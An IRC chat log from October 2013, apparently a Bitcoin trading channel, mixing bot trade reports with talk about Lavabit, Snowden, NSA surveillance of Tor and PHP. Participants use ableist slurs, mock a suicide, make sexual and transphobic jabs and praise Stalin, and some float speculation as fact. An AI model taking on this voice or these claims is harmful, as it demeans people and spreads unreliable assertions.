BTC [+] {2} Oct 04 03:11:33 [BTCTC] [LABCOIN] 4530 @ 0.0001861 = 0.843 BTC [-] {2} Oct 04 03:15:36 [HAVELOCK] [DEALCO] 50 @ 0.0075 = 0.375 BTC [+] Oct 04 03:18:39 [HAVELOCK] [CBTC] 20000 @ 0.00017001 = 3.4002 BTC [-] {2} Oct 04 03:22:43 [MPEX] [S.MPOE] 804 @ 0.00093203 = 0.7494 BTC [+] Oct 04 03:37:58 [MPEX] [S.BBET] 1000 @ 0.0005 = 0.5 BTC [+] Oct 04 03:37:59 [HAVELOCK] [B] [XBOND] 210 @ 0.0012 = 0.252 BTC [-] {2} Oct 04 03:39:01 [MPEX] [S.BBET] 245 @ 0.0005 = 0.1225 BTC [+] Oct 04 03:41:02 [HAVELOCK] [VTX] 2 @ 0.38 = 0.76 BTC [-] {2} Oct 04 03:41:03 [MPEX] [S.MPOE] 2100 @ 0.00092915 = 1.9512 BTC [-] Oct 04 03:44:05 [MPEX] [S.MPOE] 508 @ 0.000926 = 0.4704 BTC [-] Oct 04 03:55:16 [BTCTC] [LABCOIN] 2000 @ 0.0002186 = 0.4372 BTC [+] Oct 04 03:56:17 [HAVELOCK] [VTX] 40 @ 0.38 = 15.2 BTC [-] Oct 04 03:59:09 Subject: SIMONS_SPAM USPS - Your package is available for pickup ( Parcel 492552468475 ) Oct 04 03:59:15 dude how retarded can they get already. Oct 04 03:59:55 whats up with petamine Oct 04 04:02:15 nothing ? Oct 04 04:02:48 Just say no to pedo Oct 04 04:19:40 [BTCTC] [PAJKA.BOND] 20 @ 0.01 = 0.2 BTC [-] Oct 04 04:21:42 [BTCTC] [DMS.MINING] 157 @ 0.001188 = 0.1865 BTC [-] Oct 04 04:33:54 [MPEX] [S.MPOE] 2150 @ 0.00093191 = 2.0036 BTC [+] {2} Oct 04 05:04:24 [BTCTC] [ASICMINER-PT] 1 @ 1 BTC [+] Oct 04 05:14:35 [MPEX] [S.MPOE] 1450 @ 0.00093104 = 1.35 BTC [-] {2} Oct 04 05:28:49 [BTCTC] [DMS.MINING] 163 @ 0.001188 = 0.1936 BTC [-] Oct 04 05:31:52 [BTCTC] [FN] [DMS.PURCHASE] 28 @ 0.006207 = 0.1738 BTC [-] Oct 04 05:32:53 [BTCTC] [FN] [DMS.PURCHASE] 100 @ 0.0062 = 0.62 BTC [-] Oct 04 05:33:54 [BTCTC] [FN] [DMS.PURCHASE] 225 @ 0.006109 = 1.3745 BTC [-] Oct 04 05:33:54 [MPEX] [S.MPOE] 6504 @ 0.00092455 = 6.0133 BTC [-] {2} Oct 04 05:34:55 [BTCTC] [FN] [DMS.PURCHASE] 140 @ 0.00610671 = 0.8549 BTC [-] {2} Oct 04 05:36:57 [BTCTC] [FN] [DMS.PURCHASE] 574 @ 0.0061 = 3.5014 BTC [-] {2} Oct 04 05:46:06 [BTCTC] [ASICMINER-PT] 1 @ 0.98 BTC [-] Oct 04 05:49:09 [HAVELOCK] [AM100] 84 @ 0.00852697 = 0.7163 BTC [+] {5} Oct 04 05:54:14 [HAVELOCK] [B] [XBOND] 110 @ 0.00118927 = 0.1308 BTC [-] {2} Oct 04 05:55:15 [HAVELOCK] [B] [XBOND] 157 @ 0.00118031 = 0.1853 BTC [-] {3} Oct 04 05:55:35 http://trilema.com/2013/so-whos-running-the-courts-circus/ Oct 04 05:55:37 So who’s running the Courts circus ? pe Trilema - Un blog de Mircea Popescu. Oct 04 05:55:53 i muchly advised anyone interesting in mattering in bitcoin to read that whole thing. Oct 04 05:56:16 [HAVELOCK] [LABCO] 600 @ 0.0005 = 0.3 BTC [+] {2} Oct 04 05:56:39 let';s try again with better grammar. Oct 04 05:56:45 i muchly advise anyone interested in mattering in bitcoin to read that whole thing. Oct 04 06:00:23 i'm selling lube if anyone neeeds any for jail Oct 04 06:01:08 VanCleef: make sure to also offer cyanide, for the Aaron Schwartz school of thought. Oct 04 06:01:33 VanCleef: and 'arse safes' to secrete said cyanide in, a la Goering. Oct 04 06:02:22 fun fact: you can see Herr Goering's actual arse safe in the 'spy museum' in Wash., DC. Oct 04 06:02:25 fuck mattering, were just here to get rich from mining ponzis Oct 04 06:03:19 and re: Schwartz, go go gadget darwin Oct 04 06:03:54 dub: personally, I'd prefer the 'magic' tooth from Dune. Oct 04 06:04:00 dub that's a point. Oct 04 06:04:16 just building the crumb of trails for future mpoe-pr bitchslappings. Oct 04 06:04:25 [HAVELOCK] [AM1] 7 @ 0.91285714 = 6.39 BTC [+] {2} Oct 04 06:04:27 provided of course some retard venue will still exist in the future... Oct 04 06:05:26 [MPEX] [S.MPOE] 2180 @ 0.00092365 = 2.0136 BTC [-] {2} Oct 04 06:05:56 how sails the forum lulzboat? Oct 04 06:06:05 I have no time for drama these days :( Oct 04 06:06:26 [MPEX] [S.MPOE] 770 @ 0.00092301 = 0.7107 BTC [-] {2} Oct 04 06:06:34 still down afaik Oct 04 06:06:48 has the patented intersango 'we'll pay you to return our data' method brought a result Oct 04 06:07:27 [HAVELOCK] [B] [XBOND] 165 @ 0.00117077 = 0.1932 BTC [-] {5} Oct 04 06:07:28 mircea_popescu: aside from historical/nostalgic concerns, what would be the purpose of having the list of judges ? Oct 04 06:08:20 im pretty sure it will come out that the judges that play ball have about an order of magnitude better chances to progress. Oct 04 06:08:28 [BTCTC] [LABCOIN] 5000 @ 0.0002 = 1 BTC [+] Oct 04 06:08:42 whereas women that suck cock have a less than twice as better chances to progress. Oct 04 06:08:43 mircea_popescu: seems like a foregone conclusion. Oct 04 06:08:55 documentation is documentation. Oct 04 06:08:56 mircea_popescu: think of Soviet judges. Oct 04 06:09:36 i am certainly more interested in judges being raped by the usg than in secretaries being raped by their bosses. Oct 04 06:10:15 so correspondingly more resources should be directed to fight the former than the later, by a significant margin. Oct 04 06:11:07 mircea_popescu: not sure about how writing a list of modern-day Soviet (or otherwise) judges fights anything... Oct 04 06:12:00 picture a list of Mexican policemen who forgo bribes. so what. Oct 04 06:12:32 [HAVELOCK] [B] [XBOND] 252 @ 0.00116102 = 0.2926 BTC [-] {3} Oct 04 06:12:50 so you have the list. Oct 04 06:13:31 society, at least the livable sort, is built from causes not towards effects. Oct 04 06:13:33 [HAVELOCK] [AM100] 30 @ 0.00996665 = 0.299 BTC [+] {2} Oct 04 06:13:34 [BTCTC] [ASICMINER-PT] 1 @ 0.9613 BTC [-] Oct 04 06:13:42 it matters not one whit what "benefit" your correct actions yield. Oct 04 06:14:45 at any rate, as far as i know the average grad student takes a few months to gather 25 btc in living grants/we, and if literate should be able to complete the task in that time. Oct 04 06:14:59 I'm thinking also about the side-effects. Imagine printing a list of foot-dragging German judges in the '30s. Oct 04 06:15:30 the pirce is now at 133.7 Oct 04 06:16:35 don't for a second imagine the bad boys don't keep that list. Oct 04 06:16:52 they have the time and inclination to compile tax harassment programmes for charities for chrissakes. Oct 04 06:17:02 this is merely a minute attempt to remedy an information imbalance. Oct 04 06:17:27 Don't get me wrong, I'd love to read the result Oct 04 06:17:58 i'd love to see whether the numerous and very self-important "law blogs" get it or not and how long it takes them to. Oct 04 06:18:14 these fellows will probably end up on some dour memorial plaque somewhere, maybe glued to the wall where the firing squad stood Oct 04 06:18:25 nobody's shooting any judges. Oct 04 06:18:54 I was thinking of the 'good ones', if that wasn't clear Oct 04 06:19:26 I'm rather pessimistic about their prospects in the far future, particularly the younger ones Oct 04 06:19:51 where did Stalin put uncooperative judges? Oct 04 06:20:40 [BTCTC] [ASICMINER-PT] 3 @ 0.9613 = 2.8839 BTC [-] {2} Oct 04 06:21:45 I don't expect to grow old myself, and I'm not even remotely a judge. Dissenting or otherwise. Oct 04 06:21:54 listen, you take too much for granted. Oct 04 06:22:07 stalin was a man after my own heart. you can not find someone half stalin in the entire us today. Oct 04 06:22:30 plenty of fellows with the inclinations, sans the gifts. Oct 04 06:23:05 yeah well... Oct 04 06:23:27 you know what, in russia cca 1930 there were a bunch of fuckwits with round glasses and a tufty chin beard. Oct 04 06:23:33 they didn't magically become trotsky. Oct 04 06:23:43 [HAVELOCK] [B] [XBOND] 573 @ 0.00115343 = 0.6609 BTC [-] {5} Oct 04 06:24:09 mircea_popescu: do you remember Roland Freisler? perhaps he was the first truly modern judge. Oct 04 06:24:37 meanwhile the happy brigade has uncovered a bunch of negative reviews. seems this hilton guy is really very pro govt ? Oct 04 06:25:05 uncooperative lawyers dont become judges Oct 04 06:25:30 i don't know what exactly is modern about him ? the rolls are full since at least the 1300s with the same type. Oct 04 06:25:32 court-ier. Oct 04 06:26:05 Vexual the strange thing is that in civil systems it's precisely the uncooperative lawyers that tend to become judges. Oct 04 06:26:20 mircea_popescu: point. Bernard Gui & friends. Oct 04 06:26:33 basically the kids out of law school split in three groups : those who deal well with people, and they end up lawyers. those who have daddy issues, and they become das. Oct 04 06:26:40 finally those with neither quality. they end up judges. Oct 04 06:29:19 I'd like to point out that we do not yet know how the Levison story ends. Oct 04 06:29:53 personally, i don't care how it ends. Oct 04 06:30:01 the man sent the 4 point 11 pages key. Oct 04 06:30:14 at least we know paper wallets are safe Oct 04 06:30:50 [BTCTC] [ASICMINER-PT] 1 @ 1.02 BTC [+] Oct 04 06:31:06 if sufficiently small :D Oct 04 06:31:08 you know, if the key is genuine (no bits diddled) the inquisitor got much of what he wanted. safe to assume that every packet lavabit shat or ate in its entire life was recorded. Oct 04 06:31:58 Levison quoted a rather high cost (several $k) for changing his SSL certs, so presumably he did not do it often. Oct 04 06:32:23 that's the other thing. what sort of braindamaged retard actually expects ssl to protect his email. Oct 04 06:32:28 well, other than snowden Oct 04 06:32:31 that's a whole separate question Oct 04 06:33:53 [MPEX] [S.MPOE] 2100 @ 0.00092288 = 1.938 BTC [-] Oct 04 06:33:54 [BTCTC] [LABCOIN] 11631 @ 0.0002 = 2.3262 BTC [+] {2} Oct 04 06:36:18 there's also the issue of people who are literate enough to have some idea of what real security is, but not literate enough to practice it. Oct 04 06:36:35 these just sit catatonically and don't do much of anything, i imagine Oct 04 06:37:03 so we're left with the snowdens and ulbrichts (who become public fools) and the rest (who are invisible.) Oct 04 06:37:39 i still don't quite grasp this part. Oct 04 06:37:50 think 'groklaw' Oct 04 06:37:59 so bradley manning, a total emo fuckwit, somehow managed to be a big honcho in us signals. Oct 04 06:38:07 but hey, shit happens, right ? his co was retarded. Oct 04 06:38:08 manning was a grunt Oct 04 06:38:14 with some janitorial keys Oct 04 06:38:17 dude, he had the stuff ? he was a big honcho. Oct 04 06:38:27 grunts do not get access to petabytes of crap Oct 04 06:38:39 in the u.s., the way it works is that there's a 'secret' (vs. 'top', etc.) intranet Oct 04 06:38:39 moving on : snowden defects. Oct 04 06:38:50 apparently snowden does not know how to secure communications. Oct 04 06:39:01 yet he has enough data to bury another petreus. Oct 04 06:39:12 what the fuck is going on over there, those people been turned to monkeys or something ? Oct 04 06:39:17 it is possible that he did know. but was forced to deal with people who don't Oct 04 06:39:29 heh. nobody's forced. Oct 04 06:39:36 there is some record that he tried to persuade the journalists to use gpg Oct 04 06:39:51 anyway, if this had happened in 1973 the russians would have finished all the vodka and died of split sides. Oct 04 06:40:12 asciilifeform dude, srsly. you're a field agent and you "try to" persuade ? Oct 04 06:40:24 in what parallel universe is this going on. Oct 04 06:40:30 point. betcha the Brits finished all the Lagavulin when Mitrokhin split with his treasure chest. Oct 04 06:40:30 we wouldn't have heard about it in 73 Oct 04 06:40:48 Vexual depends on your definition of we. Oct 04 06:41:01 [MPEX] [S.MPOE] 3750 @ 0.00093203 = 3.4951 BTC [+] {2} Oct 04 06:41:02 the internet et all Oct 04 06:41:13 well obviously, as it diodn't exist in 73. Oct 04 06:41:32 no Oct 04 06:41:46 mircea_popescu: have you considered the 'mr. s. is a disinfo agent' hypothesis? Oct 04 06:42:02 sure. Oct 04 06:42:16 he needn't be aware of the fact, either Oct 04 06:42:21 certainly. Oct 04 06:42:29 easy to set things up so some fool walks off with 'everything he wants' Oct 04 06:42:29 but mind you, my discussion is purely procedural. Oct 04 06:42:39 whether he in fact is a defector or a mole, intentional or not, Oct 04 06:42:49 the story still goes the way describe it. Oct 04 06:43:19 in short, whether the gas station theft was genuine or staged, Oct 04 06:43:21 the guy still can't drive. Oct 04 06:43:32 AFAIK, the only reason i have to consider the 'disinfo' hypothesis is the actual effects of the circus Oct 04 06:43:50 what i want to know is why the us signals corps is made out of monkeys! Oct 04 06:44:04 it's a disgrace, they'll get cut out of nato meetings at this rate Oct 04 06:44:09 the way the french were in the 70s. Oct 04 06:44:14 the lusers driven off lavabit likely won't be using gpg, they'll be dropping plaintext (or going home and crying.) Oct 04 06:44:26 cui bono Oct 04 06:44:37 cui bono what ? Oct 04 06:44:55 people distrusting crypto (of snake oil and genuine varieties, both) Oct 04 06:44:57 left and right Oct 04 06:45:00 who wins Oct 04 06:45:15 stupidity and laziness need no ulterior motive. Oct 04 06:45:19 its a big job Oct 04 06:45:27 this is like inquiring who wins out of the roman notion that blowjobs cause cavities. Oct 04 06:46:18 if you were the fuhrer of NSA, and your minions have not yet found a pill against rsa/etc., what would you do? Oct 04 06:46:56 there's more than one way to steer people away from modern crypto Oct 04 06:47:30 mircea_popescu: you're probably right that this is a crackpot hypothesis, it presumes competence where, as far as we know, none is left Oct 04 06:47:39 if i were the fuhrer of the nsa i would be putting backdoors in every single code or cypher used by the usg Oct 04 06:47:43 and leak all the keys Oct 04 06:47:44 all the time. Oct 04 06:48:08 [BTCTC] [DMS.MINING] 92 @ 0.001188 = 0.1093 BTC [-] Oct 04 06:48:11 which perhaps explains why there is no competence left in there. Oct 04 06:48:23 they probably heard the exact same thing a thousand times so far. Oct 04 06:48:26 btw I find it interesting that the names, brief histories, and approximate purposes of the 'Suite A' ciphers (nsa proprietary) used to be on wikipedia Oct 04 06:48:43 and not one (save the ill-fated Skipjack) has ever seen the light of day Oct 04 06:48:53 yeah they got a letter of cachet Oct 04 06:49:07 got really excited about it all at the top cockless geek level. Oct 04 06:49:29 funny part is that every 'spam wikipedia' (clone) still has them Oct 04 06:49:53 the names/abstracts, that is, nobody save the owners have seen the algos Oct 04 06:50:34 myeah. Oct 04 06:50:42 actually here's a great idea to troll wikipedia Oct 04 06:50:47 recreate those articles lol Oct 04 06:51:44 whoah Oct 04 06:51:55 the idiot wiki-printers still have this crap Oct 04 06:51:57 http://www.amazon.co.uk/JOSEKI-cipher-Ronald-Jesse-Russell/dp/B007OVDGVS Oct 04 06:51:59 JOSEKI (cipher): Amazon.co.uk: Ronald Cohn Jesse Russell: Books Oct 04 06:53:13 [BTCTC] [LABCOIN] 5000 @ 0.0002 = 1 BTC [-] Oct 04 06:53:34 http://en.wikipedia.org/wiki/Talk:NSA_Suite_A_Cryptography Oct 04 06:54:32 "It cannot be that a search warrant is "general" merely because it gives the government a tool that, Oct 04 06:54:32 if abused Contrrary to law, could constitute a general search." Oct 04 06:54:40 dude this is certainly a novel argument. Oct 04 06:55:03 I do wonder why anybody bothered with the 'lettre du cachet', the wiki crap was the equivalent of a winamp playlist Oct 04 06:55:20 according to this nutjob a search is not general if it is objectively general as long as there's some sort of theoretical limitation on the generality. Oct 04 06:56:10 well yeah, he used the 'apartment house' analogy Oct 04 06:56:15 for instance a warrant for the search of all cars in new york "to see if there's anything fishi going on" is not general as long as there;s a dept of transportation rule against people being assholes on the road. Oct 04 06:57:03 except they're asking for copies to the front door keys, not for the front door t obe unlocked. Oct 04 06:57:19 such despicable tactics for srsly. Oct 04 06:57:49 it reflects the actual policy of the actual rulers. no surprises here. Oct 04 06:57:52 and its not illegal to unlcok the door if you have the key? Oct 04 06:58:47 dependso n how you got the key. Oct 04 06:59:19 [MPEX] [S.MPOE] 3550 @ 0.00093292 = 3.3119 BTC [+] {2} Oct 04 07:04:31 asciilifeform finally, what i don't understand in this whole thing, is why didn't the guy just take the 5th ? Oct 04 07:05:04 send his wife some email about how he had shoplifted or run a red light or w/e Oct 04 07:05:25 mircea_popescu: IANAL, but i don't think you can do that in a civil action Oct 04 07:05:26 after which he won't give the keys because he's concerned the govt might imprison him by using those keys to read his email.s Oct 04 07:05:40 they are threatening criminal contempt. it's their only actual effectual means. Oct 04 07:05:53 otherwise w/e, add 1k per day until you're done adding numbers. Oct 04 07:05:53 threatening, yes, but AFAIK this was technically a civil case. Oct 04 07:06:10 or rather, 'administrative' - sort of like traffic court Oct 04 07:06:46 if he sat around until they physically dragged him off, he might've been able to (might still, actually) end up in criminal proceedings Oct 04 07:06:52 where he might try to take the 5th Oct 04 07:07:41 might want to ask a real live lawyer about this one Oct 04 07:10:27 itmakes little difference tho. Oct 04 07:10:30 [HAVELOCK] [VTX] 1 @ 0.38 BTC [-] Oct 04 07:10:32 5th defense is available throughout. Oct 04 07:11:31 besides, there's an entire mess of civil proceedings that are still criminal for the purposes of that defense. Oct 04 07:11:31 [HAVELOCK] [VTX] 7 @ 0.38 = 2.66 BTC [-] Oct 04 07:12:49 I imagine there was a precedent where it didn't fly. That, or L and all of his predecessors had uncommonly drunken lawyers. Oct 04 07:16:47 or pehraps a not wholly digested sense that they are interacting with their enemy Oct 04 07:16:52 rather than with their government. Oct 04 07:18:52 the judge review site is a real gem Oct 04 07:20:50 re-reading the transcript it sort-of makes it sound as if the fbi and the judge had prior agreement Oct 04 07:21:10 and then in court the judge was confronted with a different request from what was agreed in advance. Oct 04 07:21:36 pretty fucking pernicious this, the defendant doesn't get to go around and chat weith the judge off the record first, before picking one. Oct 04 07:22:18 my suspicion is that the inquisitor (the fellow who actually ran the show) - and definitely the judge - weren't really prepared for the 'we don't have a backdoor already' statement by L Oct 04 07:22:37 possibly. Oct 04 07:22:53 damn near everything has an obvious administrative backdoor by default Oct 04 07:23:05 fucking obnoxious dude, that. hello! jim mays here with the government's latest pile of nonsense!" Oct 04 07:23:06 L's system, lame as it was for obvious reasons, was unusual in that regard. Oct 04 07:23:55 and that binall guy is a retard. Oct 04 07:25:45 [HAVELOCK] [VTX] 5 @ 0.38 = 1.9 BTC [-] Oct 04 07:26:46 [HAVELOCK] [AM100] 47 @ 0.00979993 = 0.4606 BTC [-] Oct 04 07:27:47 [HAVELOCK] [AM100] 143 @ 0.00979993 = 1.4014 BTC [-] Oct 04 07:28:20 i suspect that the screws will be tightened soon, and the rules that apply to telephone exchanges (illegal to run without user-friendly backdoor at your own expense) will be applied elsewhere. Oct 04 07:29:24 net result, us loses the shred of internet relevance it still has Oct 04 07:29:44 for example, it now is (or soon will be, depending on what document you believe) to sell a car in the u.s. without a remote-disable radio. Oct 04 07:29:54 i don't see why this is so hard to graps, but the sovereignity of the internet is not negotiable, it is mandatory. Oct 04 07:30:10 yes but cars run in the us. Oct 04 07:30:38 it would be interesting to see an internet that doesn't consist mainly of u.s. telecom oligopolies. Oct 04 07:32:26 maybe time to bring back fidonet. Oct 04 07:32:36 it doesn't mainly consist of us telecom now. Oct 04 07:32:46 whatcher talking about. Oct 04 07:33:03 ok, replace 'us' with 'nato block' Oct 04 07:34:18 see, don't misunderstand, nato doesn't formally own all the oceanic fibers, etc. but if someone can cut your fiber and weld it back with a magic box inline, and you can't do squat about it... you don't own said fiber. Oct 04 07:34:26 even if you paid for the boat and so forth Oct 04 07:35:40 by this aergument the russians own the intertnet. Oct 04 07:36:29 the cream of the russian navy was rusting and irradiating walrus, last i checked Oct 04 07:37:15 i don't think the ussr lived to get fiber taps right Oct 04 07:37:16 that may or may not be. factually however, the cream of the us navy is getting boobjobs and trying to be called chelsea. Oct 04 07:37:17 so... Oct 04 07:37:57 [BTCTC] [DMS.MINING] 490 @ 0.00134979 = 0.6614 BTC [+] {5} Oct 04 07:38:20 i do wonder about the fellows who built 'Glomar Explorer'. all dead/senile by now? Oct 04 07:39:49 oh wow Oct 04 07:39:54 people are active Oct 04 07:40:01 !ticker m s.mpoe Oct 04 07:40:01 [MPEX:S.MPOE] 1D: 0.00091655 / 0.00092987 / 0.00094023 (116369 shares, 108.21 BTC), 7D: 0.0007725 / 0.00086118 / 0.00094023 (413479 shares, 356.08 BTC), 30D: 0.0007725 / 0.00089704 / 0.00094307 (6497057 shares, 5,828.18 BTC) Oct 04 07:41:00 [BTCTC] [B] [CIPHERMINE.B1] 208 @ 0.00820384 = 1.7064 BTC [-] {2} Oct 04 07:56:43 asciilifeform check this shit out : "Only 517 full time magistrate judges and 42 part-time magistrate judges plus some weirdo who is both magistrate judge and court clerk, as of 2009. Guess there couldn’t have been many more in 1993. So I’ll start looking for or making that list. Probably start next week because of the blogging thing." Oct 04 08:07:27 [MPEX] [S.MPOE] 1800 @ 0.00093391 = 1.681 BTC [+] {2} **** BEGIN LOGGING AT Fri Oct 4 14:05:21 2013 Oct 04 14:20:13 hey topace Ukyo http://trilema.com/2013/so-whos-running-the-courts-circus/ give a coin would you ? Oct 04 14:29:27 [BTCTC] [DMS.MINING] 630 @ 0.00119304 = 0.7516 BTC [-] {2} Oct 04 14:30:28 [BTCTC] [DMS.MINING] 170 @ 0.001191 = 0.2025 BTC [-] Oct 04 14:34:32 [BTCTC] [ASICMINER-PT] 26 @ 0.96399999 = 25.064 BTC [-] {4} Oct 04 14:42:40 [BTCTC] [B] [CIPHERMINE.B1] 28 @ 0.0082 = 0.2296 BTC [-] Oct 04 14:46:44 [MPEX] [S.MPOE] 950 @ 0.00092675 = 0.8804 BTC [+] {2} Oct 04 14:58:08 $vwap ^oix Oct 04 14:58:09 mircea_popescu: ^OIX 1 day: no data 7 day: average: 103.17256816 high: 221.93443406 low: 89.5310801 volume: 19 btc: 7.95373126 30 day: no data Oct 04 14:58:19 the way that shit works out... 103 huh. Oct 04 14:58:34 d34th darkip daszorz davout daybyter deadweasel deizel Diablo-D3 Digger Digger_ Dimsler dub Duffer1 Oct 04 14:58:35 d34th darkip daszorz davout daybyter deadweasel deizel Diablo-D3 Digger Digger_ Dimsler dub Duffer1 Oct 04 14:59:58 [HAVELOCK] [AM1] 12 @ 0.99999998 = 12 BTC [+] {2} Oct 04 14:59:59 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 04 15:00:59 [HAVELOCK] [AM1] 4 @ 1.083 = 4.332 BTC [+] {2} Oct 04 15:04:02 [HAVELOCK] [AM1] 10 @ 1.11999998 = 11.2 BTC [+] Oct 04 15:06:04 [HAVELOCK] [AM1] 7 @ 1.14057142 = 7.984 BTC [+] {4} Oct 04 15:07:05 [HAVELOCK] [AM100] 55 @ 0.00944908 = 0.5197 BTC [+] {2} Oct 04 15:08:06 [HAVELOCK] [AM100] 48 @ 0.00948054 = 0.4551 BTC [+] {3} Oct 04 15:13:11 [BTCTC] [FN] [DMS.PURCHASE] 300 @ 0.00611 = 1.833 BTC [+] Oct 04 15:25:18 MP around? Oct 04 15:26:51 socialism ftw Oct 04 15:27:05 nope doesn't look like he's around Oct 04 15:31:28 [BTCTC] [FN] [DMS.PURCHASE] 57 @ 0.00610087 = 0.3477 BTC [-] {2} Oct 04 15:31:28 [MPEX] [S.MPOE] 600 @ 0.00092203 = 0.5532 BTC [-] {2} Oct 04 15:53:51 [MPEX] [S.MPOE] 2550 @ 0.00092604 = 2.3614 BTC [+] Oct 04 15:59:57 [BTCTC] [LABCOIN] 1882 @ 0.000195 = 0.367 BTC [-] Oct 04 15:59:57 [MPEX] [S.MPOE] 2760 @ 0.00092139 = 2.543 BTC [-] Oct 04 16:04:34 ;;nethash Oct 04 16:04:35 1447310.16542 Oct 04 16:04:38 ;;bcstats Oct 04 16:04:42 ;;estimate Oct 04 16:04:51 Current Blocks: 261668 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 411 blocks | Next Difficulty In About: 2 days, 6 hours, and 3 seconds | Next Difficulty Estimate: 185257911.629 | Estimated Percent Change: 24.48522 Oct 04 16:04:51 Next difficulty estimate | 185257911.629 based on data since last change | 202183809.301 based on data for last three days Oct 04 16:16:14 [BTCTC] [S.MPOE-PT] 252 @ 0.00083807 = 0.2112 BTC [+] {3} Oct 04 16:31:28 [HAVELOCK] [B] [XBOND] 100 @ 0.0012 = 0.12 BTC [+] {2} Oct 04 16:36:33 [BTCTC] [ASICMINER-PT] 1 @ 1 BTC [+] Oct 04 16:37:34 [BTCTC] [MININGCO.ETF] 8 @ 0.012575 = 0.1006 BTC [-] {3} Oct 04 16:39:52 why does campbx have a price limit of 1111.11 dollars? They don't let you put in asks for higher than that amount? Oct 04 16:40:57 plambert: a lot of exchanges have limits Oct 04 16:41:31 it just seems like a strange number for the limit Oct 04 16:41:32 cavirtex limits the bids to 1/10th of last trade, and the asks to 10 times last trade Oct 04 16:49:46 [HAVELOCK] [KCIM] 4 @ 0.20025002 = 0.801 BTC [-] {3} Oct 04 17:04:00 [BTCTC] [LABCOIN] 1000 @ 0.0002183 = 0.2183 BTC [+] Oct 04 17:18:14 [HAVELOCK] [B] [XBOND] 8490 @ 0.0012 = 10.188 BTC [+] Oct 04 17:27:28 jurov http://www.dailymail.co.uk/news/article-2443656/Bank-error-makes-restaurant-manager-worlds-trillionaire-offered-pay-national-debt-glitch-spotted.html Oct 04 17:31:36 If I saw that much cash in my account I'd conver it to BTC ASAP. Oct 04 17:33:49 lol 404! Oct 04 17:35:04 ;;market --buy 4040404040404 Oct 04 17:35:04 This order would exceed the size of the order book. You would buy 58928.026 bitcoins, for a total of 763585337.8132 USD and take the price to 1793300000.0000. | Data vintage: 13.7287 seconds Oct 04 17:36:33 [BTCTC] [LABCOIN] 5225 @ 0.0002185 = 1.1417 BTC [+] {2} Oct 04 17:37:38 ;;bc,24hprc Oct 04 17:37:38 123.96 Oct 04 17:38:14 mod6 i was thinking the same thing lol. account not found! Oct 04 17:40:19 :> Oct 04 17:41:46 http://www.cnbc.com/id/101082066 Oct 04 17:41:47 Wall St. wonders if Obama wants a selloff Oct 04 17:41:49 pretty lulzy stuff. Oct 04 17:42:03 lolzylicious. Oct 04 17:42:04 us president goes "the markets aren't paying enough attention, we are going to default!" Oct 04 17:42:08 the markets drop less than 1 %. Oct 04 17:42:23 i guess he's not particularly important in the us. Oct 04 17:43:06 He needed to get Burnanke to say it, then we'd see a sell off. Oct 04 17:43:08 :) Oct 04 17:43:13 trying hard to troll the markets Oct 04 17:43:54 bernanke's out anyway. Oct 04 17:44:00 but the marketplace knows oh bummer is always lying so not too much damage Oct 04 17:44:18 The markets eat him up though. If you want to crash it, have Burnanke say something negative. Oct 04 17:44:38 The bank, which asked their customer not to identify them, had made the error during an online banking update - I wonder which bank it was? Oct 04 17:46:26 http://www.wcsh6.com/news/watercooler/article/258720/108/Mississippi-bank-mistake-leaves-customers-with-trillion-dollar-deposits Oct 04 17:46:26 Mississippi bank mistake leaves customers with trillion dollar deposits | wcsh6.com Oct 04 17:46:32 http://5newsonline.com/2013/10/03/bank-error-sends-trillions-to-fort-smith-womans-account/ Oct 04 17:46:37 http://swtimes.com/news/bank-glitch-enters-4-trillion-fort-smith-account Oct 04 17:46:38 Bank Glitch Enters $4 Trillion To Fort Smith Account | The Times Record Oct 04 17:46:42 apparently it's been all over. Oct 04 17:46:47 Interesting. Oct 04 17:47:12 So, if you have time to remove any amount of that do you get charged or does it qualify as a banking error and they eat the cost? Oct 04 17:47:30 (Or deoes FDIC cover it...?) Oct 04 17:47:35 does* Oct 04 17:48:41 depends how able you are to retain counsel. Oct 04 17:48:54 but in general, it's a clerical error, you owe them Oct 04 17:49:07 anyway, it was BancorpSouth Oct 04 18:07:02 [BTCTC] [LABCOIN] 1530 @ 0.0002186 = 0.3345 BTC [+] Oct 04 18:07:24 hey look, NSA has been targeting tor: http://rt.com/usa/nsa-target-tor-network-739/ Oct 04 18:07:27 who knew? :P Oct 04 18:08:33 lolk Oct 04 18:09:46 'owns and operates' counts as 'targeting' now ? Oct 04 18:11:39 it;s gotten to the point where pps sheets are classified top secret Oct 04 18:13:06 they're classifying boogers and diapers next Oct 04 18:15:10 [MPEX] [S.MPOE] 4664 @ 0.00087326 = 4.0729 BTC [-] Oct 04 18:15:23 anyone read the powerpoint crap yet? Oct 04 18:15:28 it reeks of disinfo Oct 04 18:15:37 yeah Oct 04 18:15:44 no way in hell do these buggers not operate several Tb/sec worth of nodes Oct 04 18:15:46 it's what powerpoint is made for, neh ? Oct 04 18:19:20 Schneier: http://www.theguardian.com/world/2013/oct/04/tor-attacks-nsa-users-online-anonymity Oct 04 18:21:35 i'm with asciilifeform's suggestion : that pps is prima facie evidence that the nsa is in fact currently decoding ALL traffic passing through all tor nodes, linking it to originating ips and storing this mess. Oct 04 18:22:58 mircea_popescu: interestingly, the 'tor foundation' is a lot like the 'bitcoin foundation' but more so. they have a list of 'authority' nodes that every client prefers by default. Oct 04 18:23:48 yeah, it's quite clear that the bitcoin foundation is constructed according to a desgned specification, not unique to it. Oct 04 18:24:35 maybe not necessarily clear to the average 27 yo muppet who thinks building php code out of stack exchange snippets makes him a businessman, Oct 04 18:24:45 but the trained eye doth see the signs. Oct 04 18:24:54 php is so erreeet Oct 04 18:25:06 dude! it does everything Oct 04 18:25:24 and it's been around for ages, so you know it's secure Oct 04 18:25:28 there's nothing wrong with php Oct 04 18:25:49 the dorks are the problem. php Oct 04 18:25:50 s fine Oct 04 18:25:53 there are many things wrong with php Oct 04 18:26:16 in today's internet a preprocessor scares me Oct 04 18:26:22 no offense, internet Oct 04 18:26:26 http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/ Oct 04 18:26:27 PHP: a fractal of bad design - fuzzy notepad Oct 04 18:26:31 dude. it's for serving blogs and stuff like that. Oct 04 18:26:43 would you stop torturing things. Oct 04 18:27:01 I'm with mike_c. PHP is a language for nihilists Oct 04 18:27:07 i remember this php blog post Oct 04 18:27:40 wish i saved the one that rebuttals it Oct 04 18:28:07 it is so funny though Oct 04 18:28:09 there is no rebutal. this is written by someone with years of experience using 